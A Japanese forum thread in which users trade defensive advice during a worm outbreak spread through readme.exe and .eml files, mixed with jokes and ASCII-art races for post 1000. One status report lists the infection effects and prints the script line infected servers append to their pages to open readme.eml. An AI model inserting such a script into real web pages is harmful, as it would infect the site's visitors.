　　　　　　　２３：００〜０３：００の間はつながり難いです！何度もトライ！
　　　　　　　http://fusianasan.2ch.net/←は、裏ドメインの為「直リン」で飛んでも
　　　　　　　「鯖が見つかりません」になります。入り口は「表２ch」のＣＧＩだけです。

MSXでよかったヽ(´ー｀)ノ

>>928
しつこいのぉ。fusianasanじゃホスト名が晒されてしまうぞ・・

nanasisan！ずうっと寝てないよねやっぱ？
しかも、このレスの多さ。スゲェヨＹＯ！！

ワクチンソフトって、ＣＰＵの石を守るのか（ﾜﾗ
だいたい、特殊だから普通にリンクをはれないって、
リファラがあるとはじくのか。
しかもパスワードが全角文字かよ…。

ダウンロードはじめたはいいんだけど残り24秒になってから既に2時間が経過。
どうなってんだ？

>>931
そろそろ寝たい・・

マイクロソフトのサイトが非常に重い。
2chで宣伝すると、DDoS攻撃に匹敵する破壊力になってしまうよ。

おっさんは明日以降にするわ。DL。

>>929
確かにＭＳＸには感染しないね
最強のＭＳ製品じゃない？

ログを拾い読みしただけなので、既出かもしれないけれど・・
ＳＰ２を入れてから、Ｏ．Ｅの画面が消えてしまいました。
Ｏ．Ｅも何かしないといけないのでしょうか？
ちなみに、ツールバーは生きてます

>>914
遅くなったけど、それＳｉｒｃａｍだね。
http://www.ipa.go.jp/security/topics/sircam.html
とかを参考にしたら良いよ。

申し訳ない。そろそろ寝ることにするよ・・・
きっと深夜は深夜で別の方が助けてくれるだろうことを信じつつ・・・。

　　　　　　　　　　　　　 _人
　　　　　　　　　　　ノ⌒　丿
　　　　　　　　＿／　　 ::（
　　　　　　　/　　　　　:::::::＼
　　　　　　 （　　　　　:::::::;;;;;;;）＿
　　　　　　　＼＿――￣￣::::::::::＼ 　　　 　　　　1000狙います!!
　　　＼　　ﾉ￣　　　　　::::::::::::::::::::::） 　／
　　　　 ＼（　　　　　::::::::::::::;;;;;;;;;;;;人／
　　　　　／￣―――――￣￣::::::::＼
　　　　（　　　　● ＼＿＿／::●:::::::::::::）
　　　　 .＼＿＿::::::::::＼／;;;;;;;;;;;;;;;;;;;;;;ノ

>>934
寝てもいいじゃない？
ほぼネタはがいしゅつでしょ。
そこまで、厨房に付き合わなくといいと思うよ。

ふ〜〜〜〜。
やっと全部読み終わったＹＯ！
感染してなかったＹＯ！
心配な奴はとりあえず全部読め！！

＞nanasisan
ほんとにありがとうございます！！！！

nanasisanさん、ありがとうございました。

今日はお疲れ様でした。ごゆっくりお休みください。

nanasisanお疲れでした。
助かりました。

>>940
おやすみです。

この時期、半角板に逝くのは
タイに行く位危ないでしょうか？

状況報告ver1.06(前編)
対策
1.IE5.01とIE5.5はSP2以外無条件でDL実行してしまうので、感染前ならアップデートする
2.それでもダイアログは開くので、覚えのないファイルはDLしない。
3.ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ
　→java関連とダウンロードのファイルのダウンロードを不許可。
　ダウンロードの不許可は保険の保険なので、必要ない人には必要なし。

現在わかっている影響
1.メールによるウイルスファイルの頒布
2.WEBコンテンツ閲覧時にそのサーバにパケットを送り攻撃、感染する。
3.バックドアを開き、クライアントを丸裸にする。
4.大量の*.emlファイルを量産する。
5.感染したPCはCドライブをネットワーク共有する。
6.システムのスローダウン
7.リソースの消耗
8.他のファイルに潜伏する。

メールによる接触時
ウィルス感染したメールを受信したとき、readme.exe はwav（音声）ファイルになりすます。

LANによる感染
　社内に一人でも対策してないひとがいてノーパスとかにしていた場合
　LANの共有フォルダを使っても自己増殖する。

感染鯖
　ソースの最後に<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>
が追加される。

http://news.2ch.net/test/read.cgi?bbs=news&key=1000867662

>>947
　いや、アフガンだろ

今までFW（含PFW）も導入せず、ウイルス対策もしてなかったような
やつらが何を今になって慌ててるんだか・・・・

状況報告ver1.06(後編)
感染の有無の確認
1.●トレンドマイクロ　オンラインスキャン
http://www.trendmicro.co.jp/hcall/scan.htm

2.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
　*.emlが大量にHITした際は確定。
　ただし、それが以前に自分の書いた見覚えのあるメールだったら、
それはウイルスではない。
　そうでないときは後者2個を削除して様子を見る。
　といっても後者二つを消したからウイルスが消えるわけではない。
　ファイルのDLを拒否してもファイルが作成されたという報告
(多分一時ファイルに残っているだけだろうが)があるので、
危険ブラウザでない人もファイルのDLを不許可にした方がいい。
3.『mep』で検索した際に『mep????.tmp』がHITする(らしい)


感染時の対応
　感染してしまった後は、アップデートしても無意味。
　とりあえず感染を拡大しないようにウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテンツを回らない。
　むしろ自他の被害の拡大を考えるならOS(又は感染以前のバックアップ)から
入れ直した方がいい。

　感染前に対応ブラウザにして、DL拒否しているのにスキャンで
感染しているというときは多分『インターネット一時ファイル』
に残っているので、気になるならツール→インターネットオプション→
全般→インターネット一時ファイル→ファイルの削除

　ワクチンできたよとかの情報など、追加のフォローさらに宜しく！＞ALL

>>934
今日はありがとう。
ゆっくり風呂でも入って、マターリしておくれ。

>>952
おつかれ

次スレはセキュリティ板に立ててちょ

>>955
速報板の方がｲｲ

速報板にしてはこのスレあんまりもりあがってないね。

>957
スレが２つあるからね

>>912
結〜んで〜ひ〜ら〜い〜て〜

TBSでもやってる。

サイバーテロ…

つぎのすれ
http://news.2ch.net/test/read.cgi?bbs=news&key=1000909667

>>928 逝ってよし

そろそろ加速？

２ちゃんに引きこもるか･･･

俺はもうやられたよ。
鬱だ氏脳

今コンビニでワクチンソフト売ってないよね??以前はあったんだが。

1000はまだか？

IE5.5をWindowsUpdateでインストールしようとしたんですが
標準インストールじゃなければまずいでしょうか？
プラウザだけでは駄目？

1000！

しかし　シマンテックもうすぐ安置ウイルス2002がでるんだが2001買いたく無い

見て感染は防げそうだけど
添付メールのほうは防げないの？

readme.exeを含まれる文字列で検索したら5つあったけど、
やばいの？

１０００う

1000

>>973
やばいよ

>>973
名前のほうで再チェック

ブラウザで速報板を見たら、ウイルスへの警告文があった。
なんかこわー

よいよい

　　 　　/ ） ／￣￣￣￣￣￣￣
　　　　　　　 　　　 ./ /　|　　１０００!!
　　　　　　　　　　 / /　　＼　　　　　　　　　 ／￣￣￣
　　　　　　 　　　 / /　　　　￣|／￣￣￣￣|　　 マンセー
　　　　　　　　　./Λ＿Λ　　　　, -つ　　 　 ＼　　　　　　　　　 ／
　　　　　　　 　/<丶｀∀´>　 .／__ノ　　　　　　　￣∨￣￣￣￣
　　　　　　　　/　　　　＼　／ /　　 ⊂_ヽ､
　　　　　　　 .|　　　　へ／ ／　　　　 　.＼＼　 Λ＿Λ　　　
　　　　　　　 |　　　　ﾚ'　 /､二つ　　　　 　 ＼ （　´Д｀）
　　　　　　　 |　　　　　／　　　　　　　　　 　　>　　⌒ヽ
　　　　　　　/　　　／　　　　　　 　　　　　　/　　　 へ ＼
　　　　　　 /　 ／　　　　　　　　　　　　　　/　 　 /　　 ＼＼
　　　　　　/　 /　　　　　　　　　　　　　　　ﾚ　　ノ　　　　　ヽ_つ
　　　　 ／　ノ　　　　　　 　　　　　　　　　/　 /
　　　_/　／　　　　　　　　　　　　　　　　/　 /|
　 ノ　／　　　　　　　　　　　　　　　　　 （　（　､
⊂ -'　　　　　　　　　　　　　　　　　　　　|　 |､　＼
　　　　　　　　　　　　　　　　　　　　　　　|　/　＼　⌒l
　　　　　　　　　　　　　　　　　　　　　　　|　|　　　）　/
　　　　　　　　　　　　　　　　　　　　　　ノ　 ）　　 し'
　　　　　　　　　　　　　　　　　　　　　(＿／　　　

オイラのばあい・・・トレンドマイクロでスキャンしたけど
何一つウイルスは引っかかってなかった。

次スレ
http://news.2ch.net/test/read.cgi?bbs=news&key=1000909667
http://news.2ch.net/test/read.cgi?bbs=news&key=1000909667
http://news.2ch.net/test/read.cgi?bbs=news&key=1000909667
http://news.2ch.net/test/read.cgi?bbs=news&key=1000909667

このスレを読んでなお分からない事を聞くように。
教える方はボランティアです。
お礼もいいがムダにログを増やすので心の中でお礼を言うので十分です。

このスレ９８０超えても、緩やかな伸び方・・・。

最近にしては異常だ（ｗ

　　　　　　　 　　 　　/ ） ／￣￣￣￣￣￣￣
　　　　　　　 　　　 ./ /　|　　飛び出せ！！
　　　　　　　　　　 / /　　＼　　　　　　　　　 ／￣￣￣￣￣￣
　　　　　　 　　　 / /　　　　￣|／￣￣￣￣|　　１０００！！
　　　　　　　　　./∧＿∧　　　　, -つ　　　　＼
　　　　　　　 　/<丶｀∀´>　 .／__ノ　　　　　　 ￣∨￣￣￣￣
　　　　　　　　/　　　　＼　／ /　　 ⊂_ヽ､
　　　　　　　 .|　　　　へ／ ／　　　　 　.＼＼　 ∧＿∧　　
　　　　　　　 |　　　　ﾚ'　 /､二つ　　　　 　 ＼ （　´Д｀ ）
　　　　　　　 |　　　　　／　　　　　　　　　 　　>　　⌒ヽ
　　　　　　　/　　　／　　　　　　 　　　　　　/　　　 へ ＼
　　　　　　 /　 ／　　　　　　　　　　　　　　/　 　 /　　 ＼＼
　　　　　　/　 /　　　　　　　　　　　　　　　ﾚ　　ノ　　　　　ヽ_つ
　　　　 ／　ノ　　　　　　 　　　　　　　　　/　 /
　　　_/　／　　　　　　　　　　　　　　　　/　 /|
　 ノ　／　　　　　　　　　　　　　　　　　 （　（　､
⊂ -'　　　　　　　　　　　　　　　　　　　　|　 |､　＼
　　　　　　　　　　　　　　　　　　　　　　　|　/　＼　⌒l
　　　　　　　　　　　　　　　　　　　　　　　|　|　　　）　/
　　　　　　　　　　　　　　　　　　　　　　ノ　 ）　　 し'
　　　　　　　　　　　　　　　　　　　　　(＿／　

１０００GET

1000

JavaScriptの切り方：
インターネットオプション
↓
セキュリティレベルのカスタマイズ
↓
JavaScriptの無効
ついでにJavaも無効
ダウンロードも無効

こうしておけば、簡単な対策にはなるの？

今ここに何人いるのだろう？
なんか　ﾄﾞｷﾄﾞｷしてきたYO！

マターリしててイイ！

1000かな？

1000

伸びがおそいぞ
そろそろ１０００かな

思ったより１０００いくのがスローペース（ｗ

１０００！！！（ｗ

　|￣￣￣￣￣￣￣￣￣|
　|　　　　１０００！　　　　|
　|＿＿＿＿＿＿＿＿＿|
　　　 ∧∧ ||
　　　 ( ﾟдﾟ)||
　　　 /　づΦ

1000000

11

　　　　　　　　　　　　　 _人
　　　　　　　　　　　ノ⌒　丿
　　　　　　　　＿／　　 ::（
　　　　　　　/　　　　　:::::::＼
　　　　　　 （　　　　　:::::::;;;;;;;）＿
　　　　　　　＼＿――￣￣::::::::::＼ 　　　 　　　　ﾔﾀｰ!!
　　　＼　　ﾉ￣　　　　　::::::::::::::::::::::） 　／
　　　　 ＼（　　　　　::::::::::::::;;;;;;;;;;;;人／
　　　　　／￣―――――￣￣::::::::＼
　　　　（　　　　● ＼＿＿／::●:::::::::::::）
　　　　 .＼＿＿::::::::::＼／;;;;;;;;;;;;;;;;;;;;;;ノ

ガ━━（ﾟДﾟ;）━━ン！ 1000ｼﾞｬﾅｲ!!!

このスレッドは１０００を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。